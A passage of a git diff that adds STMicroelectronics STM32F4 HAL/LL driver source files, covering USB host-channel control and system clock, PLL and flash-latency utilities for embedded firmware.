((USBx->GAHBCFG & USB_OTG_GAHBCFG_DMAEN) == 0U) + { + if ((USBx->HNPTXSTS & (0xFFU << 16)) == 0U) + { + USBx_HC(hcnum)->HCCHAR &= ~USB_OTG_HCCHAR_CHENA; + USBx_HC(hcnum)->HCCHAR |= USB_OTG_HCCHAR_CHENA; + USBx_HC(hcnum)->HCCHAR &= ~USB_OTG_HCCHAR_EPDIR; + do + { + if (++count > 1000U) + { + break; + } + } while ((USBx_HC(hcnum)->HCCHAR & USB_OTG_HCCHAR_CHENA) == USB_OTG_HCCHAR_CHENA); + } + else + { + USBx_HC(hcnum)->HCCHAR |= USB_OTG_HCCHAR_CHENA; + } + } + } + else + { + USBx_HC(hcnum)->HCCHAR |= USB_OTG_HCCHAR_CHDIS; + + if ((USBx_HOST->HPTXSTS & (0xFFU << 16)) == 0U) + { + USBx_HC(hcnum)->HCCHAR &= ~USB_OTG_HCCHAR_CHENA; + USBx_HC(hcnum)->HCCHAR |= USB_OTG_HCCHAR_CHENA; + USBx_HC(hcnum)->HCCHAR &= ~USB_OTG_HCCHAR_EPDIR; + do + { + if (++count > 1000U) + { + break; + } + } while ((USBx_HC(hcnum)->HCCHAR & USB_OTG_HCCHAR_CHENA) == USB_OTG_HCCHAR_CHENA); + } + else + { + USBx_HC(hcnum)->HCCHAR |= USB_OTG_HCCHAR_CHENA; + } + } + + return HAL_OK; +} + +/** + * @brief Initiate Do Ping protocol + * @param USBx Selected device + * @param hc_num Host Channel number + * This parameter can be a value from 1 to 15 + * @retval HAL state + */ +HAL_StatusTypeDef USB_DoPing(USB_OTG_GlobalTypeDef *USBx, uint8_t ch_num) +{ + uint32_t USBx_BASE = (uint32_t)USBx; + uint32_t chnum = (uint32_t)ch_num; + uint32_t num_packets = 1U; + uint32_t tmpreg; + + USBx_HC(chnum)->HCTSIZ = ((num_packets << 19) & USB_OTG_HCTSIZ_PKTCNT) | + USB_OTG_HCTSIZ_DOPING; + + /* Set host channel enable */ + tmpreg = USBx_HC(chnum)->HCCHAR; + tmpreg &= ~USB_OTG_HCCHAR_CHDIS; + tmpreg |= USB_OTG_HCCHAR_CHENA; + USBx_HC(chnum)->HCCHAR = tmpreg; + + return HAL_OK; +} + +/** + * @brief Stop Host Core + * @param USBx Selected device + * @retval HAL state + */ +HAL_StatusTypeDef USB_StopHost(USB_OTG_GlobalTypeDef *USBx) +{ + uint32_t USBx_BASE = (uint32_t)USBx; + uint32_t count = 0U; + uint32_t value; + uint32_t i; + + (void)USB_DisableGlobalInt(USBx); + + /* Flush FIFO */ + (void)USB_FlushTxFifo(USBx, 0x10U); + (void)USB_FlushRxFifo(USBx); + + /* Flush out any leftover queued requests. */ + for (i = 0U; i <= 15U; i++) + { + value = USBx_HC(i)->HCCHAR; + value |= USB_OTG_HCCHAR_CHDIS; + value &= ~USB_OTG_HCCHAR_CHENA; + value &= ~USB_OTG_HCCHAR_EPDIR; + USBx_HC(i)->HCCHAR = value; + } + + /* Halt all channels to put them into a known state. */ + for (i = 0U; i <= 15U; i++) + { + value = USBx_HC(i)->HCCHAR; + value |= USB_OTG_HCCHAR_CHDIS; + value |= USB_OTG_HCCHAR_CHENA; + value &= ~USB_OTG_HCCHAR_EPDIR; + USBx_HC(i)->HCCHAR = value; + + do + { + if (++count > 1000U) + { + break; + } + } while ((USBx_HC(i)->HCCHAR & USB_OTG_HCCHAR_CHENA) == USB_OTG_HCCHAR_CHENA); + } + + /* Clear any pending Host interrupts */ + USBx_HOST->HAINT = 0xFFFFFFFFU; + USBx->GINTSTS = 0xFFFFFFFFU; + + (void)USB_EnableGlobalInt(USBx); + + return HAL_OK; +} + +/** + * @brief USB_ActivateRemoteWakeup active remote wakeup signalling + * @param USBx Selected device + * @retval HAL status + */ +HAL_StatusTypeDef USB_ActivateRemoteWakeup(USB_OTG_GlobalTypeDef *USBx) +{ + uint32_t USBx_BASE = (uint32_t)USBx; + + if ((USBx_DEVICE->DSTS & USB_OTG_DSTS_SUSPSTS) == USB_OTG_DSTS_SUSPSTS) + { + /* active Remote wakeup signalling */ + USBx_DEVICE->DCTL |= USB_OTG_DCTL_RWUSIG; + } + + return HAL_OK; +} + +/** + * @brief USB_DeActivateRemoteWakeup de-active remote wakeup signalling + * @param USBx Selected device + * @retval HAL status + */ +HAL_StatusTypeDef USB_DeActivateRemoteWakeup(USB_OTG_GlobalTypeDef *USBx) +{ + uint32_t USBx_BASE = (uint32_t)USBx; + + /* active Remote wakeup signalling */ + USBx_DEVICE->DCTL &= ~(USB_OTG_DCTL_RWUSIG); + + return HAL_OK; +} +#endif /* defined (USB_OTG_FS) || defined (USB_OTG_HS) */ + + +/** + * @} + */ + +/** + * @} + */ +#endif /* defined (USB_OTG_FS) || defined (USB_OTG_HS) */ +#endif /* defined (HAL_PCD_MODULE_ENABLED) || defined (HAL_HCD_MODULE_ENABLED) */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_utils.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_utils.c new file mode 100644 index 000000000..96f65272b --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_utils.c @@ -0,0 +1,752 @@ +/** + ****************************************************************************** + * @file stm32f4xx_ll_utils.c + * @author MCD Application Team + * @brief UTILS LL module driver. + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2017 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_ll_utils.h" +#include "stm32f4xx_ll_rcc.h" +#include "stm32f4xx_ll_system.h" +#include "stm32f4xx_ll_pwr.h" +#ifdef USE_FULL_ASSERT +#include "stm32_assert.h" +#else +#define assert_param(expr) ((void)0U) +#endif /* USE_FULL_ASSERT */ + +/** @addtogroup STM32F4xx_LL_Driver + * @{ + */ + +/** @addtogroup UTILS_LL + * @{ + */ + +/* Private types -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private constants ---------------------------------------------------------*/ +/** @addtogroup UTILS_LL_Private_Constants + * @{ + */ +#if defined(RCC_MAX_FREQUENCY_SCALE1) +#define UTILS_MAX_FREQUENCY_SCALE1 RCC_MAX_FREQUENCY /*!< Maximum frequency for system clock at power scale1, in Hz */ +#endif /*RCC_MAX_FREQUENCY_SCALE1 */ +#define UTILS_MAX_FREQUENCY_SCALE2 RCC_MAX_FREQUENCY_SCALE2 /*!< Maximum frequency for system clock at power scale2, in Hz */ +#if defined(RCC_MAX_FREQUENCY_SCALE3) +#define UTILS_MAX_FREQUENCY_SCALE3 RCC_MAX_FREQUENCY_SCALE3 /*!< Maximum frequency for system clock at power scale3, in Hz */ +#endif /* MAX_FREQUENCY_SCALE3 */ + +/* Defines used for PLL range */ +#define UTILS_PLLVCO_INPUT_MIN RCC_PLLVCO_INPUT_MIN /*!< Frequency min for PLLVCO input, in Hz */ +#define UTILS_PLLVCO_INPUT_MAX RCC_PLLVCO_INPUT_MAX /*!< Frequency max for PLLVCO input, in Hz */ +#define UTILS_PLLVCO_OUTPUT_MIN RCC_PLLVCO_OUTPUT_MIN /*!< Frequency min for PLLVCO output, in Hz */ +#define UTILS_PLLVCO_OUTPUT_MAX RCC_PLLVCO_OUTPUT_MAX /*!< Frequency max for PLLVCO output, in Hz */ + +/* Defines used for HSE range */ +#define UTILS_HSE_FREQUENCY_MIN 4000000U /*!< Frequency min for HSE frequency, in Hz */ +#define UTILS_HSE_FREQUENCY_MAX 26000000U /*!< Frequency max for HSE frequency, in Hz */ + +/* Defines used for FLASH latency according to HCLK Frequency */ +#if defined(FLASH_SCALE1_LATENCY1_FREQ) +#define UTILS_SCALE1_LATENCY1_FREQ FLASH_SCALE1_LATENCY1_FREQ /*!< HCLK frequency to set FLASH latency 1 in power scale 1 */ +#endif +#if defined(FLASH_SCALE1_LATENCY2_FREQ) +#define UTILS_SCALE1_LATENCY2_FREQ FLASH_SCALE1_LATENCY2_FREQ /*!< HCLK frequency to set FLASH latency 2 in power scale 1 */ +#endif +#if defined(FLASH_SCALE1_LATENCY3_FREQ) +#define UTILS_SCALE1_LATENCY3_FREQ FLASH_SCALE1_LATENCY3_FREQ /*!< HCLK frequency to set FLASH latency 3 in power scale 1 */ +#endif +#if defined(FLASH_SCALE1_LATENCY4_FREQ) +#define UTILS_SCALE1_LATENCY4_FREQ FLASH_SCALE1_LATENCY4_FREQ /*!< HCLK frequency to set FLASH latency 4 in power scale 1 */ +#endif +#if defined(FLASH_SCALE1_LATENCY5_FREQ) +#define UTILS_SCALE1_LATENCY5_FREQ FLASH_SCALE1_LATENCY5_FREQ /*!< HCLK frequency to set FLASH latency 5 in power scale 1 */ +#endif +#define UTILS_SCALE2_LATENCY1_FREQ FLASH_SCALE2_LATENCY1_FREQ /*!< HCLK frequency to set FLASH latency 1 in power scale 2 */ +#define UTILS_SCALE2_LATENCY2_FREQ FLASH_SCALE2_LATENCY2_FREQ /*!< HCLK frequency to set FLASH latency 2 in power scale 2 */ +#if defined(FLASH_SCALE2_LATENCY3_FREQ) +#define UTILS_SCALE2_LATENCY3_FREQ FLASH_SCALE2_LATENCY3_FREQ /*!< HCLK frequency to set FLASH latency 2 in power scale 2 */ +#endif +#if defined(FLASH_SCALE2_LATENCY4_FREQ) +#define UTILS_SCALE2_LATENCY4_FREQ FLASH_SCALE2_LATENCY4_FREQ /*!< HCLK frequency to set FLASH latency 4 in power scale 2 */ +#endif +#if defined(FLASH_SCALE2_LATENCY5_FREQ) +#define UTILS_SCALE2_LATENCY5_FREQ FLASH_SCALE2_LATENCY5_FREQ /*!< HCLK frequency to set FLASH latency 5 in power scale 2 */ +#endif +#if defined(FLASH_SCALE3_LATENCY1_FREQ) +#define UTILS_SCALE3_LATENCY1_FREQ FLASH_SCALE3_LATENCY1_FREQ /*!< HCLK frequency to set FLASH latency 1 in power scale 3 */ +#endif +#if defined(FLASH_SCALE3_LATENCY2_FREQ) +#define UTILS_SCALE3_LATENCY2_FREQ FLASH_SCALE3_LATENCY2_FREQ /*!< HCLK frequency to set FLASH latency 2 in power scale 3 */ +#endif +#if defined(FLASH_SCALE3_LATENCY3_FREQ) +#define UTILS_SCALE3_LATENCY3_FREQ FLASH_SCALE3_LATENCY3_FREQ /*!< HCLK frequency to set FLASH latency 3 in power scale 3 */ +#endif +#if defined(FLASH_SCALE3_LATENCY4_FREQ) +#define UTILS_SCALE3_LATENCY4_FREQ FLASH_SCALE3_LATENCY4_FREQ /*!< HCLK frequency to set FLASH latency 4 in power scale 3 */ +#endif +#if defined(FLASH_SCALE3_LATENCY5_FREQ) +#define UTILS_SCALE3_LATENCY5_FREQ FLASH_SCALE3_LATENCY5_FREQ /*!< HCLK frequency to set FLASH latency 5 in power scale 3 */ +#endif +/** + * @} + */ + +/* Private macros ------------------------------------------------------------*/ +/** @addtogroup UTILS_LL_Private_Macros + * @{ + */ +#define IS_LL_UTILS_SYSCLK_DIV(__VALUE__) (((__VALUE__) == LL_RCC_SYSCLK_DIV_1) \ + || ((__VALUE__) == LL_RCC_SYSCLK_DIV_2) \ + || ((__VALUE__) == LL_RCC_SYSCLK_DIV_4) \ + || ((__VALUE__) == LL_RCC_SYSCLK_DIV_8) \ + || ((__VALUE__) == LL_RCC_SYSCLK_DIV_16) \ + || ((__VALUE__) == LL_RCC_SYSCLK_DIV_64) \ + || ((__VALUE__) == LL_RCC_SYSCLK_DIV_128) \ + || ((__VALUE__) == LL_RCC_SYSCLK_DIV_256) \ + || ((__VALUE__) == LL_RCC_SYSCLK_DIV_512)) + +#define IS_LL_UTILS_APB1_DIV(__VALUE__) (((__VALUE__) == LL_RCC_APB1_DIV_1) \ + || ((__VALUE__) == LL_RCC_APB1_DIV_2) \ + || ((__VALUE__) == LL_RCC_APB1_DIV_4) \ + || ((__VALUE__) == LL_RCC_APB1_DIV_8) \ + || ((__VALUE__) == LL_RCC_APB1_DIV_16)) + +#define IS_LL_UTILS_APB2_DIV(__VALUE__) (((__VALUE__) == LL_RCC_APB2_DIV_1) \ + || ((__VALUE__) == LL_RCC_APB2_DIV_2) \ + || ((__VALUE__) == LL_RCC_APB2_DIV_4) \ + || ((__VALUE__) == LL_RCC_APB2_DIV_8) \ + || ((__VALUE__) == LL_RCC_APB2_DIV_16)) + +#define IS_LL_UTILS_PLLM_VALUE(__VALUE__) (((__VALUE__) == LL_RCC_PLLM_DIV_2) \ + || ((__VALUE__) == LL_RCC_PLLM_DIV_3) \ + || ((__VALUE__) == LL_RCC_PLLM_DIV_4) \ + || ((__VALUE__) == LL_RCC_PLLM_DIV_5) \ + || ((__VALUE__) == LL_RCC_PLLM_DIV_6) \ + || ((__VALUE__) == LL_RCC_PLLM_DIV_7) \ + || ((__VALUE__) == LL_RCC_PLLM_DIV_8) \ + || ((__VALUE__) == LL_RCC_PLLM_DIV_9) \ + || ((__VALUE__) == LL_RCC_PLLM_DIV_10) \ + || ((__VALUE__) == LL_RCC_PLLM_DIV_11) \ + || ((__VALUE__) == LL_RCC_PLLM_DIV_12) \ + || ((__VALUE__) == LL_RCC_PLLM_DIV_13) \ + || ((__VALUE__) == LL_RCC_PLLM_DIV_14) \ + || ((__VALUE__) == LL_RCC_PLLM_DIV_15) \ + || ((__VALUE__) == LL_RCC_PLLM_DIV_16) \ + || ((__VALUE__) == LL_RCC_PLLM_DIV_17) \ + || ((__VALUE__) == LL_RCC_PLLM_DIV_18) \ + || ((__VALUE__) == LL_RCC_PLLM_DIV_19) \ + || ((__VALUE__) == LL_RCC_PLLM_DIV_20) \ + || ((__VALUE__) == LL_RCC_PLLM_DIV_21) \ + || ((__VALUE__) == LL_RCC_PLLM_DIV_22) \ + || ((__VALUE__) == LL_RCC_PLLM_DIV_23) \ + || ((__VALUE__) == LL_RCC_PLLM_DIV_24) \ + || ((__VALUE__) == LL_RCC_PLLM_DIV_25) \ + || ((__VALUE__) == LL_RCC_PLLM_DIV_26) \ + || ((__VALUE__) == LL_RCC_PLLM_DIV_27) \ + || ((__VALUE__) == LL_RCC_PLLM_DIV_28) \ + || ((__VALUE__) == LL_RCC_PLLM_DIV_29) \ + || ((__VALUE__) == LL_RCC_PLLM_DIV_30) \ + || ((__VALUE__) == LL_RCC_PLLM_DIV_31) \ + || ((__VALUE__) == LL_RCC_PLLM_DIV_32) \ + || ((__VALUE__) == LL_RCC_PLLM_DIV_33) \ + || ((__VALUE__) == LL_RCC_PLLM_DIV_34) \ + || ((__VALUE__) == LL_RCC_PLLM_DIV_35) \ + || ((__VALUE__) == LL_RCC_PLLM_DIV_36) \ + || ((__VALUE__) == LL_RCC_PLLM_DIV_37) \ + || ((__VALUE__) == LL_RCC_PLLM_DIV_38) \ + || ((__VALUE__) == LL_RCC_PLLM_DIV_39) \ + || ((__VALUE__) == LL_RCC_PLLM_DIV_40) \ + || ((__VALUE__) == LL_RCC_PLLM_DIV_41) \ + || ((__VALUE__) == LL_RCC_PLLM_DIV_42) \ + || ((__VALUE__) == LL_RCC_PLLM_DIV_43) \ + || ((__VALUE__) == LL_RCC_PLLM_DIV_44) \ + || ((__VALUE__) == LL_RCC_PLLM_DIV_45) \ + || ((__VALUE__) == LL_RCC_PLLM_DIV_46) \ + || ((__VALUE__) == LL_RCC_PLLM_DIV_47) \ + || ((__VALUE__) == LL_RCC_PLLM_DIV_48) \ + || ((__VALUE__) == LL_RCC_PLLM_DIV_49) \ + || ((__VALUE__) == LL_RCC_PLLM_DIV_50) \ + || ((__VALUE__) == LL_RCC_PLLM_DIV_51) \ + || ((__VALUE__) == LL_RCC_PLLM_DIV_52) \ + || ((__VALUE__) == LL_RCC_PLLM_DIV_53) \ + || ((__VALUE__) == LL_RCC_PLLM_DIV_54) \ + || ((__VALUE__) == LL_RCC_PLLM_DIV_55) \ + || ((__VALUE__) == LL_RCC_PLLM_DIV_56) \ + || ((__VALUE__) == LL_RCC_PLLM_DIV_57) \ + || ((__VALUE__) == LL_RCC_PLLM_DIV_58) \ + || ((__VALUE__) == LL_RCC_PLLM_DIV_59) \ + || ((__VALUE__) == LL_RCC_PLLM_DIV_60) \ + || ((__VALUE__) == LL_RCC_PLLM_DIV_61) \ + || ((__VALUE__) == LL_RCC_PLLM_DIV_62) \ + || ((__VALUE__) == LL_RCC_PLLM_DIV_63)) + +#define IS_LL_UTILS_PLLN_VALUE(__VALUE__) ((RCC_PLLN_MIN_VALUE <= (__VALUE__)) && ((__VALUE__) <= RCC_PLLN_MAX_VALUE)) + +#define IS_LL_UTILS_PLLP_VALUE(__VALUE__) (((__VALUE__) == LL_RCC_PLLP_DIV_2) \ + || ((__VALUE__) == LL_RCC_PLLP_DIV_4) \ + || ((__VALUE__) == LL_RCC_PLLP_DIV_6) \ + || ((__VALUE__) == LL_RCC_PLLP_DIV_8)) + +#define IS_LL_UTILS_PLLVCO_INPUT(__VALUE__) ((UTILS_PLLVCO_INPUT_MIN <= (__VALUE__)) && ((__VALUE__) <= UTILS_PLLVCO_INPUT_MAX)) + +#define IS_LL_UTILS_PLLVCO_OUTPUT(__VALUE__) ((UTILS_PLLVCO_OUTPUT_MIN <= (__VALUE__)) && ((__VALUE__) <= UTILS_PLLVCO_OUTPUT_MAX)) + +#if !defined(RCC_MAX_FREQUENCY_SCALE1) +#define IS_LL_UTILS_PLL_FREQUENCY(__VALUE__) ((LL_PWR_GetRegulVoltageScaling() == LL_PWR_REGU_VOLTAGE_SCALE2) ? ((__VALUE__) <= UTILS_MAX_FREQUENCY_SCALE2) : \ + ((__VALUE__) <= UTILS_MAX_FREQUENCY_SCALE3)) + +#elif defined(RCC_MAX_FREQUENCY_SCALE3) +#define IS_LL_UTILS_PLL_FREQUENCY(__VALUE__) ((LL_PWR_GetRegulVoltageScaling() == LL_PWR_REGU_VOLTAGE_SCALE1) ? ((__VALUE__) <= UTILS_MAX_FREQUENCY_SCALE1) : \ + (LL_PWR_GetRegulVoltageScaling() == LL_PWR_REGU_VOLTAGE_SCALE2) ? ((__VALUE__) <= UTILS_MAX_FREQUENCY_SCALE2) : \ + ((__VALUE__) <= UTILS_MAX_FREQUENCY_SCALE3)) + +#else +#define IS_LL_UTILS_PLL_FREQUENCY(__VALUE__) ((LL_PWR_GetRegulVoltageScaling() == LL_PWR_REGU_VOLTAGE_SCALE1) ? ((__VALUE__) <= UTILS_MAX_FREQUENCY_SCALE1) : \ + ((__VALUE__) <= UTILS_MAX_FREQUENCY_SCALE2)) + +#endif /* RCC_MAX_FREQUENCY_SCALE1*/ +#define IS_LL_UTILS_HSE_BYPASS(__STATE__) (((__STATE__) == LL_UTILS_HSEBYPASS_ON) \ + || ((__STATE__) == LL_UTILS_HSEBYPASS_OFF)) + +#define IS_LL_UTILS_HSE_FREQUENCY(__FREQUENCY__) (((__FREQUENCY__) >= UTILS_HSE_FREQUENCY_MIN) && ((__FREQUENCY__) <= UTILS_HSE_FREQUENCY_MAX)) +/** + * @} + */ +/* Private function prototypes -----------------------------------------------*/ +/** @defgroup UTILS_LL_Private_Functions UTILS Private functions + * @{ + */ +static uint32_t UTILS_GetPLLOutputFrequency(uint32_t PLL_InputFrequency, + LL_UTILS_PLLInitTypeDef *UTILS_PLLInitStruct); +static ErrorStatus UTILS_EnablePLLAndSwitchSystem(uint32_t SYSCLK_Frequency, LL_UTILS_ClkInitTypeDef *UTILS_ClkInitStruct); +static ErrorStatus UTILS_PLL_IsBusy(void); +/** + * @} + */ + +/* Exported functions --------------------------------------------------------*/ +/** @addtogroup UTILS_LL_Exported_Functions + * @{ + */ + +/** @addtogroup UTILS_LL_EF_DELAY + * @{ + */ + +/** + * @brief This function configures the Cortex-M SysTick source to have 1ms time base. + * @note When a RTOS is used, it is recommended to avoid changing the Systick + * configuration by calling this function, for a delay use rather osDelay RTOS service. + * @param HCLKFrequency HCLK frequency in Hz + * @note HCLK frequency can be calculated thanks to RCC helper macro or function @ref LL_RCC_GetSystemClocksFreq + * @retval None + */ +void LL_Init1msTick(uint32_t HCLKFrequency) +{ + /* Use frequency provided in argument */ + LL_InitTick(HCLKFrequency, 1000U); +} + +/** + * @brief This function provides accurate delay (in milliseconds) based + * on SysTick counter flag + * @note When a RTOS is used, it is recommended to avoid using blocking delay + * and use rather osDelay service. + * @note To respect 1ms timebase, user should call @ref LL_Init1msTick function which + * will configure Systick to 1ms + * @param Delay specifies the delay time length, in milliseconds. + * @retval None + */ +void LL_mDelay(uint32_t Delay) +{ + __IO uint32_t tmp = SysTick->CTRL; /* Clear the COUNTFLAG first */ + /* Add this code to indicate that local variable is not used */ + ((void)tmp); + + /* Add a period to guaranty minimum wait */ + if(Delay < LL_MAX_DELAY) + { + Delay++; + } + + while (Delay) + { + if((SysTick->CTRL & SysTick_CTRL_COUNTFLAG_Msk) != 0U) + { + Delay--; + } + } +} + +/** + * @} + */ + +/** @addtogroup UTILS_EF_SYSTEM + * @brief System Configuration functions + * + @verbatim + =============================================================================== + ##### System Configuration functions ##### + =============================================================================== + [..] + System, AHB and APB buses clocks configuration + + (+) The maximum frequency of the SYSCLK, HCLK, PCLK1 and PCLK2 is 180000000 Hz. + @endverbatim + @internal + Depending on the device voltage range, the maximum frequency should be + adapted accordingly to the Refenece manual. + @endinternal + * @{ + */ + +/** + * @brief This function sets directly SystemCoreClock CMSIS variable. + * @note Variable can be calculated also through SystemCoreClockUpdate function. + * @param HCLKFrequency HCLK frequency in Hz (can be calculated thanks to RCC helper macro) + * @retval None + */ +void LL_SetSystemCoreClock(uint32_t HCLKFrequency) +{ + /* HCLK clock frequency */ + SystemCoreClock = HCLKFrequency; +} + +/** + * @brief Update number of Flash wait states in line with new frequency and current + voltage range. + * @note This Function support ONLY devices with supply voltage (voltage range) between 2.7V and 3.6V + * @param HCLK_Frequency HCLK frequency + * @retval An ErrorStatus enumeration value: + * - SUCCESS: Latency has been modified + * - ERROR: Latency cannot be modified + */ +ErrorStatus LL_SetFlashLatency(uint32_t HCLK_Frequency) +{ + uint32_t timeout; + uint32_t getlatency; + uint32_t latency = LL_FLASH_LATENCY_0; /* default value 0WS */ + ErrorStatus status = SUCCESS; + + + /* Frequency cannot be equal to 0 */ + if(HCLK_Frequency == 0U) + { + status = ERROR; + } + else + { + if(LL_PWR_GetRegulVoltageScaling() == LL_PWR_REGU_VOLTAGE_SCALE1) + { +#if defined (UTILS_SCALE1_LATENCY5_FREQ) + if((HCLK_Frequency > UTILS_SCALE1_LATENCY5_FREQ)&&(latency == LL_FLASH_LATENCY_0)) + { + latency = LL_FLASH_LATENCY_5; + } +#endif /*UTILS_SCALE1_LATENCY5_FREQ */ +#if defined (UTILS_SCALE1_LATENCY4_FREQ) + if((HCLK_Frequency > UTILS_SCALE1_LATENCY4_FREQ)&&(latency == LL_FLASH_LATENCY_0)) + { + latency = LL_FLASH_LATENCY_4; + } +#endif /* UTILS_SCALE1_LATENCY4_FREQ */ +#if defined (UTILS_SCALE1_LATENCY3_FREQ) + if((HCLK_Frequency > UTILS_SCALE1_LATENCY3_FREQ)&&(latency == LL_FLASH_LATENCY_0)) + { + latency = LL_FLASH_LATENCY_3; + } +#endif /* UTILS_SCALE1_LATENCY3_FREQ */ +#if defined (UTILS_SCALE1_LATENCY2_FREQ) + if((HCLK_Frequency > UTILS_SCALE1_LATENCY2_FREQ)&&(latency == LL_FLASH_LATENCY_0)) + { + latency = LL_FLASH_LATENCY_2; + } + else + { + if((HCLK_Frequency > UTILS_SCALE1_LATENCY1_FREQ)&&(latency == LL_FLASH_LATENCY_0)) + { + latency = LL_FLASH_LATENCY_1; + } + } +#endif /* UTILS_SCALE1_LATENCY2_FREQ */ + } + if(LL_PWR_GetRegulVoltageScaling() == LL_PWR_REGU_VOLTAGE_SCALE2) + { +#if defined (UTILS_SCALE2_LATENCY5_FREQ) + if((HCLK_Frequency > UTILS_SCALE2_LATENCY5_FREQ)&&(latency == LL_FLASH_LATENCY_0)) + { + latency = LL_FLASH_LATENCY_5; + } +#endif /*UTILS_SCALE1_LATENCY5_FREQ */ +#if defined (UTILS_SCALE2_LATENCY4_FREQ) + if((HCLK_Frequency > UTILS_SCALE2_LATENCY4_FREQ)&&(latency == LL_FLASH_LATENCY_0)) + { + latency = LL_FLASH_LATENCY_4; + } +#endif /*UTILS_SCALE1_LATENCY4_FREQ */ +#if defined (UTILS_SCALE2_LATENCY3_FREQ) + if((HCLK_Frequency > UTILS_SCALE2_LATENCY3_FREQ)&&(latency == LL_FLASH_LATENCY_0)) + { + latency = LL_FLASH_LATENCY_3; + } +#endif /*UTILS_SCALE1_LATENCY3_FREQ */ + if((HCLK_Frequency > UTILS_SCALE2_LATENCY2_FREQ)&&(latency == LL_FLASH_LATENCY_0)) + { + latency = LL_FLASH_LATENCY_2; + } + else + { + if((HCLK_Frequency > UTILS_SCALE2_LATENCY1_FREQ)&&(latency == LL_FLASH_LATENCY_0)) + { + latency = LL_FLASH_LATENCY_1; + } + } + } +#if defined (LL_PWR_REGU_VOLTAGE_SCALE3) + if(LL_PWR_GetRegulVoltageScaling() == LL_PWR_REGU_VOLTAGE_SCALE3) + { +#if defined (UTILS_SCALE3_LATENCY3_FREQ) + if((HCLK_Frequency > UTILS_SCALE3_LATENCY3_FREQ)&&(latency == LL_FLASH_LATENCY_0)) + { + latency = LL_FLASH_LATENCY_3; + } +#endif /*UTILS_SCALE1_LATENCY3_FREQ */ +#if defined (UTILS_SCALE3_LATENCY2_FREQ) + if((HCLK_Frequency > UTILS_SCALE3_LATENCY2_FREQ)&&(latency == LL_FLASH_LATENCY_0)) + { + latency = LL_FLASH_LATENCY_2; + } + else + { + if((HCLK_Frequency > UTILS_SCALE3_LATENCY1_FREQ)&&(latency == LL_FLASH_LATENCY_0)) + { + latency = LL_FLASH_LATENCY_1; + } + } + } +#endif /*UTILS_SCALE1_LATENCY2_FREQ */ +#endif /* LL_PWR_REGU_VOLTAGE_SCALE3 */ + + LL_FLASH_SetLatency(latency); + /* Check that the new number of wait states is taken into account to access the Flash + memory by reading the FLASH_ACR register */ + timeout = 2; + do + { + /* Wait for Flash latency to be updated */ + getlatency = LL_FLASH_GetLatency(); + timeout--; + } while ((getlatency != latency) && (timeout > 0)); + + if(getlatency != latency) + { + status = ERROR; + } + else + { + status = SUCCESS; + } + } + return status; +} + +/** + * @brief This function configures system clock at maximum frequency with HSI as clock source of the PLL + * @note The application need to ensure that PLL is disabled. + * @note Function is based on the following formula: + * - PLL output frequency = (((HSI frequency / PLLM) * PLLN) / PLLP) + * - PLLM: ensure that the VCO input frequency ranges from @ref RCC_PLLVCO_INPUT_MIN to @ref RCC_PLLVCO_INPUT_MAX (PLLVCO_input = HSI frequency / PLLM) + * - PLLN: ensure that the VCO output frequency is between @ref RCC_PLLVCO_OUTPUT_MIN and @ref RCC_PLLVCO_OUTPUT_MAX (PLLVCO_output = PLLVCO_input * PLLN) + * - PLLP: ensure that max frequency at 180000000 Hz is reach (PLLVCO_output / PLLP) + * @param UTILS_PLLInitStruct pointer to a @ref LL_UTILS_PLLInitTypeDef structure that contains + * the configuration information for the PLL. + * @param UTILS_ClkInitStruct pointer to a @ref LL_UTILS_ClkInitTypeDef structure that contains + * the configuration information for the BUS prescalers. + * @retval An ErrorStatus enumeration value: + * - SUCCESS: Max frequency configuration done + * - ERROR: Max frequency configuration not done + */ +ErrorStatus LL_PLL_ConfigSystemClock_HSI(LL_UTILS_PLLInitTypeDef *UTILS_PLLInitStruct, + LL_UTILS_ClkInitTypeDef *UTILS_ClkInitStruct) +{ + ErrorStatus status = SUCCESS; + uint32_t pllfreq = 0U; + + /* Check if one of the PLL is enabled */ + if(UTILS_PLL_IsBusy() == SUCCESS) + { + /* Calculate the new PLL output frequency */ + pllfreq = UTILS_GetPLLOutputFrequency(HSI_VALUE, UTILS_PLLInitStruct); + + /* Enable HSI if not enabled */ + if(LL_RCC_HSI_IsReady() != 1U) + { + LL_RCC_HSI_Enable(); + while (LL_RCC_HSI_IsReady() != 1U) + { + /* Wait for HSI ready */ + } + } + + /* Configure PLL */ + LL_RCC_PLL_ConfigDomain_SYS(LL_RCC_PLLSOURCE_HSI, UTILS_PLLInitStruct->PLLM, UTILS_PLLInitStruct->PLLN, + UTILS_PLLInitStruct->PLLP); + + /* Enable PLL and switch system clock to PLL */ + status = UTILS_EnablePLLAndSwitchSystem(pllfreq, UTILS_ClkInitStruct); + } + else + { + /* Current PLL configuration cannot be modified */ + status = ERROR; + } + + return status; +} + +/** + * @brief This function configures system clock with HSE as clock source of the PLL + * @note The application need to ensure that PLL is disabled. + * - PLL output frequency = (((HSI frequency / PLLM) * PLLN) / PLLP) + * - PLLM: ensure that the VCO input frequency ranges from @ref RCC_PLLVCO_INPUT_MIN to @ref RCC_PLLVCO_INPUT_MAX (PLLVCO_input = HSI frequency / PLLM) + * - PLLN: ensure that the VCO output frequency is between @ref RCC_PLLVCO_OUTPUT_MIN and @ref RCC_PLLVCO_OUTPUT_MAX (PLLVCO_output = PLLVCO_input * PLLN) + * - PLLP: ensure that max frequency at 180000000 Hz is reach (PLLVCO_output / PLLP) + * @param HSEFrequency Value between Min_Data = 4000000 and Max_Data = 26000000 + * @param HSEBypass This parameter can be one of the following values: + * @arg @ref LL_UTILS_HSEBYPASS_ON + * @arg @ref LL_UTILS_HSEBYPASS_OFF + * @param UTILS_PLLInitStruct pointer to a @ref LL_UTILS_PLLInitTypeDef structure that contains + * the configuration information for the PLL. + * @param UTILS_ClkInitStruct pointer to a @ref LL_UTILS_ClkInitTypeDef structure that contains + * the configuration information for the 